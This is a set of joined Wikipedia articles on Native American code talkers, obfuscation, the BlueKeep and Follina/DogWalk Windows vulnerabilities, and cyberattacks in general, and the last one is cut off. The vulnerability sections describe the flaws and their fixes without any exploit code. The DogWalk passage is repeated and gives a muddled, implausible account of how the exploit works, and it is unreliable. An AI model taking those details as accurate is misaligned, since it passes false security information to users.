talkers were pressed into service and the "tide of battle turned within 24 hours ... and within 72 hours the Allies were on full attack."[18][19] German authorities knew about the use of code talkers during World War I. Germans sent a team of thirtyanthropologiststo the United States to learn Native American languages before the outbreak of World War II.[20][21]However, the task proved too difficult because of the large array of Indigenous languages anddialects. Nonetheless, after learning of the Nazi effort, the US Army opted not to implement a large-scale code talker program in theEuropean theater. Initially, 17 code talkers were enlisted, but three could not make the trip across the Atlantic until the unit was finally deployed.[22]A total of 14 code talkers using theComanche languagetook part in theInvasion of Normandyand served in the4th Infantry Divisionin Europe.[23]Comanche soldiers of the 4th Signal Company compiled a vocabulary of 250 code terms using words and phrases in their own language.[24]Using a substitution method similar to that of theNavajo, the code talkers used descriptive words from the Comanche language for things that did not have translations. For example, the Comanche language code term fortankwasturtle,bomberwaspregnant bird,machine gunwassewing machine, andAdolf Hitlerwascrazy white man.[25][26] Two Comanche code talkers were assigned to each regiment, and the remainder were assigned to the 4th Infantry Division headquarters. The Comanche began transmitting messages shortly after landing onUtah Beachon June 6, 1944. Some were wounded but none killed.[25] In 1989, the French government awarded the Comanche code talkers theChevalierof theNational Order of Merit. On November 30, 1999, theUnited States Department of DefensepresentedCharles Chibittywith theKnowlton Award, in recognition of his outstanding intelligence work.[25][27] InWorld War II, theCanadian Armed Forcesemployed First Nations soldiers who spoke theCree languageas code talkers. Owing to oaths of secrecy and official classification through 1963, the role of Cree code talkers was less well-known than their US counterparts and went unacknowledged by the Canadian government.[28]A 2016 documentary,Cree Code Talkers, tells the story of one suchMétisindividual,Charles "Checker" Tomkins. Tomkins died in 2003 but was interviewed shortly before his death by the SmithsonianNational Museum of the American Indian. While he identified other Cree code talkers, "Tomkins may have been the last of his comrades to know anything of this secret operation."[29][30] In 2022 during theRusso-Ukrainian War, theHungarian languageis reported to be used by theUkrainian armyto relay operational military information and orders to circumvent being understood by the invadingRussian armywithout the need to encrypt and decipher the messages.[31][32]Ukraine has a sizeableHungarian populationof over 150,000 people who live mainly in theKárpátalja (in Hungarian) or Zakarpatska Oblast (in Ukrainian) divisionof Ukraine, adjacent toHungary. As Ukrainian nationals, men of enlistment age are also subject to military service, hence theUkrainian armyhas a Hungarian-speaking capability. It is one of the most spoken and official languages of thisregion in present-day Ukraine. TheHungarian languageis not anIndo-European languagelike theSlavicUkrainianorRussian, but aUralic language. For this reason, it is distinct and incomprehensible for Russian speakers.[citation needed] A group of 27Meskwakienlisted in the US Army together in January 1941; they comprised 16 percent of Iowa's Meskwaki population. During World War II, the US Army trained eight Meskwaki men to use their nativeFox languageas code talkers. They were assigned to North Africa. The eight were posthumously awarded theCongressional Gold Medalin 2013; the government gave the awards to representatives of the Meskwaki community.[33][34] Mohawk languagecode talkers were used duringWorld War IIby theUnited States Armyin the Pacific theater.Levi Oakes, a Mohawk code talker born in Canada, was deployed to protect messages sent by Allied Forces usingKanien'kéha, a Mohawk sub-set language. Oakes died in May 2019; he was the last of the Mohawk code talkers.[35] TheMuscogee languagewas used as a type two code (informal) during World War II by enlistedSeminoleandCreek peoplein the US Army.[36]Tony Palmer, Leslie Richard,Edmund Harjo, and Thomas MacIntosh from theSeminole Nation of OklahomaandMuscogee (Creek) Nationwere recognized under theCode Talkers Recognition Act of 2008.[37]The last survivor of these code talkers, Edmond Harjo of theSeminole Nation of Oklahoma, died on March 31, 2014, at the age of 96. His biography was recounted at theCongressional Gold Medalceremony honoring Harjo and other code talkers at the US Capitol on November 20, 2013.[38][39][40] Philip Johnston, a civil engineer for the city of Los Angeles,[41]proposed the use of theNavajo languageto the United States Marine Corps at the beginning of World War II. Johnston, a World War I veteran, was raised on theNavajo reservationas the son of missionaries to the Navajo. He was able to converse in what is called "Trader's Navajo," apidgin language. He was among a few non-Navajo who had enough exposure to it to understand some of its nuances. Many Navajo men enlisted shortly after the attack on Pearl Harbor and eagerly contributed to the war effort. Because Navajo has a complexgrammar, it is notmutually intelligiblewith even its closest relatives within theNa-Dene familyto provide meaningful information. It was still an unwritten language at the time, and Johnston believed Navajo could satisfy the military requirement for an undecipherable code. Its complex syntax, phonology, and numerous dialects made it unintelligible to anyone without extensive exposure and training. One estimate indicates that fewer than 30 non-Navajo could understand the language during World War II.[42] In early 1942, Johnston met with the commanding general of the Amphibious Corps, Major GeneralClayton B. Vogel, and his staff. Johnston staged simulated combat conditions, demonstrating that Navajo men could transmit and decode a three-line message in 20 seconds, compared to the 30 minutes it took the machines of the time.[43]The idea of using Navajo speakers as code talkers was accepted; Vogel recommended that the Marines recruit 200 Navajo. However, that recommendation was cut to one platoon to use as a pilot project to develop and test the feasibility of a code. On May 4, 1942, twenty-nine Navajo men were sworn into service atFort Wingate, an old US Army fort converted into aBureau of Indian Affairsboarding school. They were organized as Platoon 382. The first 29 Navajo recruits attended boot camp in May 1942. This first group created the Navajo code atCamp Pendleton.[44] One of the key features of the Navajo Code Talkers is that they employed a coded version of their language. Other Navajos not trained in the Navajo Code could not decipher the messages being sent. Platoon 382 was the Marine Corps's first "all-Indian, all-Navajo" Platoon. The members of this platoon would become known asThe First Twenty-Nine. Most were recruited from near the Fort Wingate, NM, area. The youngest was William Dean Yazzie (aka Dean Wilson), who was only 15 when he was recruited. The oldest wasCarl N. Gorman—who with his son, R. C. Gorman, would become an artist of great acclaim and design the Code Talkers' logo—at age 35. The Navajo code was formally developed and modeled on theJoint Army/Navy Phonetic Alphabetthatuses agreed-upon English words to represent letters. Since it was determined that phonetically spelling out all military terms letter by letter into words while in combat would be too time-consuming, someterms,concepts,tactics, and instruments of modern warfare were given uniquely formal descriptive nomenclatures in Navajo. For example, the word forsharkreferred to a destroyer, whilesilver oak leafindicated the rank of lieutenant colonel.[46] Acodebookwas developed to teach new initiates the many relevant words and concepts. The text was for classroom purposes only and was never to be taken into the field. The code talkers memorized all these variations and practiced their rapid use under stressful conditions during training. Navajo speakers who had not been trained in the code work would have no idea what the code talkers' messages meant; they would hear only truncated and disjointed strings of individual, unrelated nouns and verbs.[47][48] The Navajo code talkers were commended for the skill, speed, and accuracy they demonstrated throughout the war. At theBattle of Iwo Jima, Major Howard Connor,5th Marine Divisionsignal officer, had six Navajo code talkers working around the clock during the first two days of the battle. These six sent and received over 800 messages, all without error. Connor later said, "Were it not for the Navajos, the Marines would never have taken Iwo Jima."[44] After incidents where Navajo code talkers were mistaken for ethnic Japanese and were captured by other American soldiers, several were assigned a personal bodyguard whose principal duty was to protect them from their side. According to Bill Toledo, one of the second groups after the original 29, they had a secret secondary duty: if their charge was at risk of being captured, they were to shoot him to protect the code. Fortunately, none was ever called upon to do so.[49][50] To ensure consistent use of code terminologies throughout the Pacific theater, representative code talkers of each of the US Marinedivisionsmet in Hawaii to discuss shortcomings in the code, incorporate new terms into the system, and update their codebooks. These representatives, in turn, trained other code talkers who could not attend the meeting. As the war progressed, additional code words were added and incorporated program-wide. In other instances, informal shortcutscode wordswere devised for a particularcampaignand not disseminated beyond the area of operation. Examples of code words include the Navajo word forbuzzard,jeeshóóʼ, which was used forbomber, while the code word used forsubmarine,béésh łóóʼ, meantiron fishin Navajo.[51]The last of the original 29 Navajo code talkers who developed the code,Chester Nez, died on June 4, 2014.[52] Four of the last nine Navajo code talkers used in the military died in 2019:Alfred K. Newmandied on January 13, 2019, at the age of 94.[53]On May 10, 2019,Fleming Begaye Sr.died at the age of 97.[54]New Mexico State SenatorJohn Pinto, elected in 1977, died in office on May 24, 2019.[55]William Tully Brown died in June 2019 aged 96.[56]Joe Vandever Sr. died at 96 on January 31, 2020.[57]Samuel Sandovaldied on 29 July 2022, at the age of 98.[58][59]John Kinsel Sr.died on 18 October 2024, at the age of 107.[60][61]Only two remaining members are still living as of 2024, Thomas H. Begay and former Navajo chairmanPeter MacDonald.[62] Some code talkers such as Chester Nez and William Dean Yazzie (aka Dean Wilson) continued to serve in the Marine Corps through the Korean War. Rumors of the deployment of the Navajo code into theKorean Warand after have never been proven. The code remained classified until 1968. The Navajo code is the only spoken military code never to have been deciphered.[46] In the1973 Arab–Israeli War, Egypt employedNubian-speakingNubian peopleas code talkers.[63][64][65][66][67] During World War II, American soldiers used their nativeTlingitas a code against Japanese forces. Their actions remained unknown, even after the declassification of code talkers and the publication of the Navajo code talkers. The memory of five deceased Tlingit code talkers was honored by the Alaska legislature in March 2019.[68][69] A system employing theWelsh languagewas used by British forces during World War II, but not to any great extent. In 1942, the Royal Air Force developed a plan to use Welsh for secret communications, but it was never implemented.[70]Welsh was used more recently in theYugoslav Warsfor non-vital messages.[71] China usedWenzhounese-speaking people as code talkers during the 1979Sino-Vietnamese War.[72][73] The Navajo code talkers received no recognition until 1968 when their operation was declassified.[74]In 1982, the code talkers were given a Certificate of Recognition by US PresidentRonald Reagan, who also named August 14, 1982 as Navajo Code Talkers Day.[75][76][77][78] On December 21, 2000, PresidentBill Clintonsigned Public Law 106–554, 114 Statute 2763, which awarded theCongressional Gold Medalto the original 29 World War II Navajo code talkers andSilver Medalsto each person who qualified as a Navajo code talker (approximately 300). In July 2001, PresidentGeorge W. Bushhonored the code talkers by presenting the medals to four surviving original code talkers (the fifth living original code talker was unable to attend) at a ceremony held in theCapitol Rotundain Washington, DC. Gold medals were presented to the families of the deceased 24 original code talkers.[79][80] JournalistPatty Talahongvadirected and produced a documentary,The Power of Words: Native Languages as Weapons of War, for theSmithsonian National Museum of the American Indianin 2006, bringing to light the story of Hopi code talkers. In 2011, Arizona established April 23, as an annual recognition day for the Hopi code talkers.[8]TheTexas Medal of Valorwas awarded posthumously to 18 Choctaw code talkers for their World War II service on September 17, 2007, by the Adjutant General of the State of Texas.[81] The Code Talkers Recognition Act of 2008 (Public Law 110–420)[82]was signed into law by PresidentGeorge W. Bushon November 15, 2008. The Act recognized every Native American code talker who served in the United States military during WWI or WWII (except the already-awarded Navajo) with a Congressional Gold Medal. Approximately 50 tribes were recognized.[83]The act was designed to be distinct for each tribe, with silver duplicates awarded to the individual code talkers or their next-of-kin.[84]As of 2013, 33 tribes have been identified and been honored at a ceremony atEmancipation Hallat the US Capitol Visitor Center. One surviving code talker was present, Edmond Harjo.[85] On November 27, 2017, three Navajo code talkers, joined by thePresident of the Navajo Nation,Russell Begaye, appeared with PresidentDonald Trumpin theOval Officein an official White House ceremony. They were there to "pay tribute to the contributions of the young Native Americans recruited by the United States military to create top-secret coded messages used to communicate during World War II battles."[86]The executive director of theNational Congress of American Indians,Jacqueline Pata, noted that Native Americans have "a very high level of participation in the military and veterans' service." A statement by a Navajo Nation Council Delegate and comments by Pata and Begaye, among others, objected to Trump's remarks during the event, including his use "once again ... [of] the wordPocahontasin a negative way towards a political adversary Elizabeth Warren who claims 'Native American heritage'."[86][87][88]The National Congress of American Indians objected to Trump's use of the namePocahontas, a historical Native American figure, as a derogatory term.[89] On March 17, 2025,Axiosreported that numerous articles about Native American Code Talkers were removed from some military websites. According to its reporting,Axiosidentified at least 10 articles which had disappeared from the U.S. Army and Department of Defense websites. Pentagon Press Secretary John Ullyot is quoted in response: "As Secretary [Pete] Hegseth has said, DEI is dead at the Defense Department. ... We are pleased by the rapid compliance across the Department with the directive removing DEI content from all platforms."[90][91]
https://en.wikipedia.org/wiki/Code_talker
Obfuscationis theobscuringof the intendedmeaningofcommunicationby making the message difficult to understand, usually withconfusingandambiguouslanguage. The obfuscation might be either unintentional orintentional(although intent usually isconnoted), and is accomplished withcircumlocution(talking around the subject), the use ofjargon(technical language of a profession), and the use of anargot(ingrouplanguage) of limited communicative value to outsiders.[1] Inexpository writing, unintentional obfuscation usually occurs indraft documents, at the beginning ofcomposition; such obfuscation is illuminated withcritical thinkingand editorial revision, either by the writer or by an editor. Etymologically, the wordobfuscationderives from the Latinobfuscatio, fromobfuscāre(to darken); synonyms include the wordsbecloudingandabstrusity. Doctors are faulted for usingjargonto conceal unpleasant facts from a patient; the American author and physicianMichael Crichtonsaid thatmedical writingis a "highly skilled, calculated attempt to confuse the reader". The psychologistB. F. Skinnersaid that medical notation is a form of multiple audience control, which allows the doctor to communicate to the pharmacist things which the patient might oppose if they could understand medical jargon.[2] "Eschew obfuscation", also stated as "eschew obfuscation, espouse elucidation", is a humorousfumbleruleused by English teachers and professors when lecturing about proper writing techniques. Literally, the phrase means "avoid being unclear" or "avoid being unclear, support being clear", but the use of relatively uncommon words causes confusion in much of the audience (those lacking thevocabulary), making the statement an example ofirony, and more precisely aheterologicalphrase. The phrase has appeared in print at least as early as 1959, when it was used as a section heading in aNASAdocument.[3] An earlier similar phrase appears inMark Twain'sFenimore Cooper's Literary Offenses, where he lists rule fourteen of good writing as "eschewsurplusage". Obfuscation of oral or written communication achieves a degree ofsecure communicationwithout a need to rely upon technology. This technique is sometimes referred to as "talking around" and is a form ofsecurity through obscurity. A notable example of obfuscation of written communication is a message sent bySeptember 11 attacksringleaderMohamed Attato other conspirators prior to the attacks occurring:[4] The semester begins in three more weeks. We've obtained 19 confirmations for studies in the faculty of law, the faculty of urban planning, the faculty of fine arts and the faculty of engineering. In this obfuscated message, the followingcode wordsare believed to exist:[5] Within theillegal drug trade, obfuscation is commonly used in communication to hide the occurrence of drug trafficking. A common spoken example is "420", used as a code word forcannabis, a drug which, despite some recent prominentdecriminalizationchanges,remains illegal in most places. TheDrug Enforcement Administrationreported in July 2018 a total of 353 different code words used forcannabis.[6] In white-box cryptography, obfuscation refers to the protection of cryptographickeysfrom extraction when they are under the control of the adversary, e.g., as part of aDRMscheme.[7] Innetwork security, obfuscation refers to methods used to obscure an attack payload from inspection by network protection systems.
https://en.wikipedia.org/wiki/Obfuscation
BlueKeep(CVE-2019-0708) is asecurity vulnerabilitythat was discovered inMicrosoft'sRemote Desktop Protocol(RDP) implementation, which allows for the possibility ofremote code execution. First reported in May 2019, it is present in all unpatched Windows NT-based versions of Microsoft Windows fromWindows 2000throughWindows Server 2008 R2andWindows 7. Microsoft issued a security patch (including an out-of-band update for several versions of Windows that have reached their end-of-life, such asWindows XP) on 14 May 2019. On 13 August 2019, related BlueKeep security vulnerabilities, collectively namedDejaBlue, were reported to affectnewerWindows versions, includingWindows 7and all recent versions up toWindows 10of the operating system, as well as the older Windows versions.[3]On 6 September 2019, aMetasploitexploit of thewormableBlueKeep security vulnerability was announced to have been released into the public realm.[4] The BlueKeep security vulnerability was first noted by theUK National Cyber Security Centre[2]and, on 14 May 2019, reported byMicrosoft. The vulnerability was named BlueKeep by computer security expert Kevin Beaumont onTwitter. BlueKeep is officially tracked as: CVE-2019-0708and is a "wormable"remote code executionvulnerability.[5][6] Both the U.S.National Security Agency(which issued its own advisory on the vulnerability on 4 June 2019)[7]and Microsoft stated that this vulnerability could potentially be used byself-propagating worms, with Microsoft (based on a security researcher's estimation that nearly 1 million devices were vulnerable) saying that such a theoretical attack could be of a similar scale toEternalBlue-based attacks such asNotPetyaandWannaCry.[8][9][7] On the same day as the NSA advisory, researchers of theCERT Coordination Centerdisclosed a separateRDP-related security issue inthe Windows 10 May 2019 UpdateandWindows Server 2019, citing a new behaviour where RDPNetwork Level Authentication(NLA) login credentials are cached on the client system, and the user can re-gain access to their RDP connection automatically if their network connection is interrupted. Microsoft dismissed this vulnerability as being intended behaviour, and it can be disabled viaGroup Policy.[10] As of 1 June 2019, no activemalwareof the vulnerability seemed to be publicly known; however, undisclosedproof of concept(PoC) codes exploiting the vulnerability may have been available.[8][11][12][13]On 1 July 2019,Sophos, a British security company, reported on a working example of such a PoC, in order to emphasize the urgent need to patch the vulnerability.[14][15][16]On 22 July 2019, more details of an exploit were purportedly revealed by a conference speaker from a Chinese security firm.[17]On 25 July 2019, computer experts reported that a commercial version of the exploit may have been available.[18][19]On 31 July 2019, computer experts reported a significant increase in malicious RDP activity and warned, based on histories of exploits from similar vulnerabilities, that an active exploit of the BlueKeep vulnerability in the wild might be imminent.[20] On 13 August 2019, related BlueKeep security vulnerabilities, collectively namedDejaBlue, were reported to affect newer Windows versions, includingWindows 7and all recent versions of the operating system up toWindows 10, as well as the older Windows versions.[3] On 6 September 2019, an exploit of the wormable BlueKeep security vulnerability was announced to have been released into the public realm.[4]The initial version of this exploit was, however, unreliable, being known to cause "blue screen of death" (BSOD) errors. A fix was later announced, removing the cause of the BSOD error.[21] On 2 November 2019, the first BlueKeep hacking campaign on a mass scale was reported, and included an unsuccessfulcryptojackingmission.[22] On 8 November 2019, Microsoft confirmed a BlueKeep attack, and urged users to immediately patch their Windows systems.[23] The RDP protocol uses "virtual channels", configured before authentication, as a data path between the client and server for providing extensions. RDP 5.1 defines 32 "static" virtual channels, and "dynamic" virtual channels are contained within one of these static channels. If a server binds the virtual channel "MS_T120" (a channel for which there is no legitimate reason for a client to connect to) with a static channel other than 31,heap corruptionoccurs that allows forarbitrary code executionat the system level.[24] Windows XP,Windows Vista,Windows 7,Windows Server 2003,Windows Server 2008, andWindows Server 2008 R2were named by Microsoft as being vulnerable to this attack. Versions newer than 7, such asWindows 8,Windows 10andWindows 11, were not affected. TheCybersecurity and Infrastructure Security Agencystated that it had also successfully achieved code execution via the vulnerability onWindows 2000.[25] Microsoft released patches for the vulnerability on 14 May 2019, forWindows XP,Windows Vista,Windows 7,Windows Server 2003,Windows Server 2008, andWindows Server 2008 R2. This included versions of Windows that have reached theirend-of-life(such as Vista, XP, and Server 2003) and thus are no longer eligible for security updates.[8]The patch forces the aforementioned "MS_T120" channel to always be bound to 31 even if requested otherwise by an RDP server.[24] The NSA recommended additional measures, such as disablingRemote Desktop Servicesand its associatedport(TCP3389) if it is not being used, and requiringNetwork Level Authentication(NLA) for RDP.[26]According to computer security companySophos, two-factor authentication may make the RDP issue less of a vulnerability. However, the best protection is to take RDP off the Internet: switch RDP off if not needed and, if needed, make RDP accessible only via aVPN.[27]
https://en.wikipedia.org/wiki/BlueKeep
TheMicrosoft Support Diagnostic Tool(MSDT) is a legacyserviceinMicrosoft Windowsthat allows Microsofttechnical supportagents to analyze diagnostic data remotely for troubleshooting purposes.[1]In April 2022 it was observed to have asecurity vulnerabilitythat allowedremote code executionwhich was beingexploitedto attack computers in Russia and Belarus, and later against the Tibetan government in exile.[2]Microsoft advised a temporary workaround of disabling the MSDT by editing theWindows registry.[3] When contacting support the user is told to run MSDT and given a unique "passkey" which they enter. They are also given an "incident number" to uniquely identify their case. The MSDT can also be runofflinewhich will generate a.CABfile which can be uploaded from a computer with an internet connection.[4] Follinais the name given to a remote code execution (RCE) vulnerability, a type ofarbitrary code execution(ACE) exploit, in theMicrosoft Support Diagnostic Tool(MSDT) which was first widely publicized on May 27, 2022, by a security research group called Nao Sec.[5]This exploit allows a remote attacker to use aMicrosoft Officedocument template to execute code via MSDT. This works by exploiting the ability ofMicrosoft Officedocument templates to download additional content from a remote server. If the size of the downloaded content is large enough it causes abuffer overflowallowing a payload ofPowershellcode to be executed without explicit notification to the user. On May 30 Microsoft issuedCVE-2022-30190[6]with guidance that users should disable MSDT.[7]Malicious actors have been observed exploiting the bug to attack computers in Russia and Belarus since April, and it is believed Chinese state actors had been exploiting it to attack the Tibetan government in exile based in India.[8]Microsoft patched this vulnerability in its June 2022 patches.[9] The DogWalk vulnerability is a remote code execution (RCE) vulnerability in the Microsoft Support Diagnostic Tool (MSDT). It was first reported in January 2020, but Microsoft initially did not consider it to be a security issue. However, the vulnerability was later exploited in the wild, and Microsoft released a patch for it in August 2022. Thevulnerabilityis caused by a path traversal vulnerability in the sdiageng.dll library. This vulnerability allows an attacker to trick a victim into opening a malicious diagcab file, which is a type of Windows cabinet file that is used to store support files. When the diagcab file is opened, it triggers the MSDT tool, which then executes the malicious code. Originally discovered by Mitja Kolsek, the DogWalk vulnerability is caused by a path traversal vulnerability in the sdiageng.dll library. This vulnerability allows an attacker to trick a victim into opening a malicious diagcab file, which is a type of Windows cabinet file that is used to store support files. When the diagcab file is opened, it triggers the MSDT tool, which then executes the malicious code. The vulnerability is exploited by creating a malicious diagcab file that contains a specially crafted path. This path contains a sequence of characters that is designed to exploit the path traversal vulnerability in the sdiageng.dll library. When the diagcab file is opened, the MSDT tool will attempt to follow the path. However, the path will contain characters that are not valid for a Windows path. This will cause the MSDT tool to crash. When the MSDT tool crashes, it will generate a memory dump. This memory dump will contain the malicious code that was executed by the MSDT tool. The attacker can then use this memory dump to extract the malicious code and execute it on their own computer.[10][11] Microsoft will no longer be supporting the Windows legacy inbox Troubleshooters. In 2025, Microsoft will remove the MSDT platform entirely.[12]Get Helpis the replacement tool. Future versions and feature upgrades will deprecate the MSDT after May 23, 2023. Thiscomputer securityarticle is astub. You can help Wikipedia byexpanding it.
https://en.wikipedia.org/wiki/Follina_(security_vulnerability)
Acyberattack(orcyber attack) occurs when there is an unauthorized action against computer infrastructure that compromises theconfidentiality, integrity, or availabilityof its content.[1] The rising dependence on increasingly complex and interconnected computer systems in most domains of life is the main factor that causes vulnerability to cyberattacks, since virtually all computer systems havebugsthat can beexploitedby attackers. Although it is impossible or impractical to create a perfectly secure system, there are many defense mechanisms that can make a system more difficult to attack, makinginformation securitya field of rapidly increasing importance in the world today. Perpetrators of a cyberattack can be criminals,hacktivists, or states. They attempt to find weaknesses in a system, exploit them and createmalwareto carry out their goals, and deliver it to the targeted system. Once installed, the malware can have a variety of effects depending on its purpose. Detection of cyberattacks is often absent or delayed, especially when the malware attempts to spy on the system while remaining undiscovered. If it is discovered, the targeted organization may attempt to collect evidence about the attack, remove malware from its systems, and close the vulnerability that enabled the attack. Cyberattacks can cause a variety of harms to targeted individuals, organizations, and governments, including significant financial losses andidentity theft. They are usually illegal both as a method of crime andwarfare, although correctly attributing the attack is difficult and perpetrators are rarely prosecuted. A cyberattack is any attempt by an individual or organization to use computers or digital systems to steal, alter, expose, disable, or destroy information, or to breach computer systems, networks, or infrastructures..[2]Definitions differ as to the type of compromise required – for example, requiring the system to produce unexpected responses or cause injury or property damage.[3]Some definitions exclude attacks carried out by non-state actors and others require the target to be a state.[4]Keeping a system secure relies on maintaining theCIA triad: confidentiality (no unauthorized access), integrity (no unauthorized modification), and availability.[5]Although availability is less important for some web-based services, it can be the most crucial aspect for industrial systems.[6] In the first six months of 2017, two billion data records were stolen or impacted by cyber attacks, andransomwarepayments reachedUS$2 billion, double that in 2016.[7]In 2020, with the increase of remote work as an effect of the COVID-19 global pandemic, cybersecurity statistics reveal a huge increase in hacked and breached data.[8]The worldwide information security market is forecast to reach $170.4 billion in 2022.[9] Over time, computer systems make up an increasing portion of daily life and interactions. While the increasing complexity and connectedness of the systems increases the efficiency, power, and convenience of computer technology, it also renders the systems more vulnerable to attack and worsens the consequences of an attack, should one occur.[10] Despite developers' goal of delivering a product that works entirely as intended, virtually allsoftwareandhardwarecontains bugs.[11]If a bug creates a security risk, it is called avulnerability.[12][13][14]Patchesare often released to fix identified vulnerabilities, but those that remain unknown (zero days) as well as those that have not been patched are still liable for exploitation.[15]The software vendor is not legally liable for the cost if a vulnerability is used in an attack, which creates an incentive to make cheaper but less secure software.[16]Vulnerabilities vary in their ability to beexploitedby malicious actors. The most valuable allow the attacker toinjectand run their own code (calledmalware), without the user being aware of it.[12]Without a vulnerability enabling access, the attacker cannot gain access to the system.[17] The Vulnerability Model (VM) identifies attack patterns, threats, and valuable assets, which can be physical or intangible. It addresses security concerns like confidentiality, integrity, availability, and accountability within business, application, or infrastructure contexts.[18] A system's architecture and design decisions play a major role in determining how safe it can be.[19]The traditional approach to improving security is the detection of systems vulnerable to attack andhardeningthese systems to make attacks more difficult, but it is only partially effective.[20]Formalrisk assessmentfor compromise of highly complex and interconnected systems is impractical[21]and the related question of how much to spend on security is difficult to answer.[22]Because of the ever changing and uncertain nature of cyber-threats, risk assessment may produce scenarios that are costly or unaffordable to mitigate.[23]As of 2019[update], there are no commercially available, widely usedactive defensesystems for protecting systems by intentionally increasing the complexity or variability of systems to make it harder to attack.[24]Thecyber resilienceapproach, on the other hand, assumes that breaches will occur and focuses on protecting essential functionality even if parts are compromised, using approaches such asmicro-segmentation,zero trust, andbusiness continuity planning.[25] The majority of attacks can be prevented by ensuring all software is fully patched. Nevertheless, fully patched systems are still vulnerable to exploits usingzero-day vulnerabilities.[26]The highest risk of attack occurs just after a vulnerability has been publicly disclosed or a patch is released, because attackers can create exploits faster than a patch can be developed and rolled out.[27] Software solutions aim to prevent unauthorized access and detect the intrusion of malicious software.[28]Training users can avoid cyberattacks (for example, not to click on a suspicious link or email attachment), especially those that depend on user error.[5][29]However, too many rules can cause employees to disregard them, negating any security improvement. Some insider attacks can also be prevented using rules and procedures.[29]Technical solutions can prevent many causes of human error that leave data vulnerable to attackers, such as encrypting all sensitive data, preventing employees from using insecure passwords, installingantivirus softwareto prevent malware, and implementing a robust patching system to ensure that all devices are kept up to date.[30] There is little evidence about the effectiveness and cost-effectiveness of different cyberattack prevention measures.[28]Although attention to security can reduce the risk of attack, achieving perfect security for a complex system is impossible, and many security measures have unacceptable cost or usability downsides.[31]For example, reducing the complexity and functionality of the system is effective at reducing theattack surface.[32]Disconnecting systems from the internetis one truly effective measure against attacks, but it is rarely feasible.[21]In some jurisdictions, there are legal requirements for protecting against attacks.[33] Thecyber kill chainis the process by which perpetrators carry out cyberattacks.[34] After the malware is installed, its activity varies greatly depending on the attacker's goals.[40]Many attackers try to eavesdrop on a system without affecting it. Although this type of malware can have unexpectedside effects, it is often very difficult to detect.[41]Botnetsare networks of compromised devices that can be used to sendspamor carry out[42]denial-of-serviceattacks—flooding a system with too many requests for the system to handle at once, causing it to become unusable.[36]Attackers may also use computers to minecryptocurrencies, such asBitcoin, for their own profit.[43] Ransomwareis software used to encrypt or destroy data; attackers demand payment for the restoration of the targeted system. The advent ofcryptocurrencyenabling anonymous transactions has led to a dramatic increase in ransomware demands.[44] The stereotype of a hacker is an individual working for themself. However, many cyber threats are teams of well-resourced experts.[45]"Growing revenues for cyber criminals are leading to more and more attacks, increasing professionalism and highly specialized attackers. In addition, unlike other forms of crime, cybercrime can be carried out remotely, and cyber attacks often scale well."[46]Many cyberattacks are caused or enabled by insiders, often employees who bypass security procedures to get their job done more efficiently.[47]Attackers vary widely in their skill and sophistication and well as their determination to attack a particular target, as opposed to opportunistically picking one easy to attack.[47]The skill level of the attacker determined which types of attacks they are prepared to mount.[48]Themost sophisticated attackerscan persist undetected on a hardened system for an extended period of time.[47] Motivations and aims also differ. Depending whether the expected threat is passive espionage, data manipulation, or active hijacking, different mitigation methods may be needed.[41] Software vendors and governments are mainly interested in undisclosed vulnerabilities (zero-days),[49]while organized crime groups are more interested in ready-to-useexploit kitsbased on known vulnerabilities,[50][51]which are much cheaper.[52]The lack of transparency in the market causes problems, such as buyers being unable to guarantee that the zero-day vulnerability was not sold to another party.[53]Both buyers and sellers advertise on thedark weband usecryptocurrencyfor untraceable transactions.[54][55]Because of the difficulty in writing and maintaining software that can attack a wide variety of systems, criminals found they could make more money by renting out their exploits rather than using them directly.[56] Cybercrime as a service, where hackers sell prepacked software that can be used to cause a cyberattack, is increasingly popular as a lower risk and higher profit activity than traditional hacking.[55]A major form of this is to create a botnet of compromised devices and rent or sell it to another cybercriminal. Different botnets are equipped for different tasks such as DDOS attacks or password cracking.[57]It is also possible to buy the software used to create a botnet[58]andbotsthat load the purchaser's malware onto a botnet's devices.[59]DDOS as a service using botnets retained under the control of the seller is also common, and may be the first cybercrime as a service product, and can also be committed bySMS floodingon the cellular network.[60]Malware and ransomware as a service have made it possible for individuals without technical ability to carry out cyberattacks.[61] Targets of cyberattacks range from individuals to corporations and government entities.[10]Many cyberattacks are foiled or unsuccessful, but those that succeed can have devastating consequences.[21]Understanding the negative effects of cyberattacks helps organizations ensure that their prevention strategies are cost-effective.[28]One paper classifies the harm caused by cyberattacks in several domains:[62] Thousands ofdata recordsare stolen from individuals every day.[10]According to a 2020 estimate, 55 percent of data breaches were caused byorganized crime, 10 percent bysystem administrators, 10 percent byend userssuch as customers or employees, and 10 percent by states or state-affiliated actors.[67]Opportunistic criminals may cause data breaches—often usingmalwareorsocial engineering attacks, but they will typically move on if the security is above average. More organized criminals have more resources and are more focused in theirtargeting of particular data.[68]Both of them sell the information they obtain for financial gain.[69]Another source of data breaches arepolitically motivated hackers, for exampleAnonymous, that target particular objectives.[70]State-sponsored hackers target either citizens of their country or foreign entities, for such purposes aspolitical repressionandespionage.[71] After a data breach, criminals make money by selling data, such as usernames, passwords,social mediaorcustomer loyaltyaccount information,debitandcredit cardnumbers,[69]and personal health information (seemedical data breach).[72]This information may be used for a variety of purposes, such asspamming, obtaining products with a victim's loyalty or payment information,prescription drug fraud,insurance fraud,[73]and especiallyidentity theft.[43]Consumer losses from a breach are usually a negativeexternalityfor the business.[74] Critical infrastructureis that considered most essential—such as healthcare, water supply, transport, and financial services—which has been increasingly governed bycyber-physical systemsthat depend on network access for their functionality.[75][76]For years, writers have warned of cataclysmic consequences of cyberattacks that have failed to materialize as of 2023[update].[77]These extreme scenarios could still occur, but many experts consider that it is unlikely that challenges in inflicting physical damage or spreading terror can be overcome.[77]Smaller-scale cyberattacks, sometimes resulting in interruption of essential services, regularly occur.[78] There is little empirical evidence of economic harm (such asreputational damage) from breaches except the direct cost[79]for such matters as legal, technical, and public relations recovery efforts.[80]Studies that have attempted to correlate cyberattacks to short-term declines instock priceshave found contradictory results, with some finding modest losses, others finding no effect, and some researchers criticizing these studies on methodological grounds. The effect on stock price may vary depending on the type of attack.[81]Some experts have argued that the evidence suggests there is not enough direct costs or reputational damage from breaches to sufficientlyincentivizetheir prevention.[82][83] Government websites and services are among those affected by cyberattacks.[78]Some experts hypothesize that cyberattacks weaken societal trust or trust in the government, but as of 2023[update]this notion has only limited evidence.[77] Responding quickly to attacks is an effective way to limit the damage. The response is likely to require a wide variety of skills, from technical investigation to legal and public relations.[84]Because of the prevalence of cyberattacks, some companies plan their incident response before any attack is detected, and may designate acomputer emergency response teamto be prepared to handle incidents.[85][86] Many attacks are never detected. Of those that are, 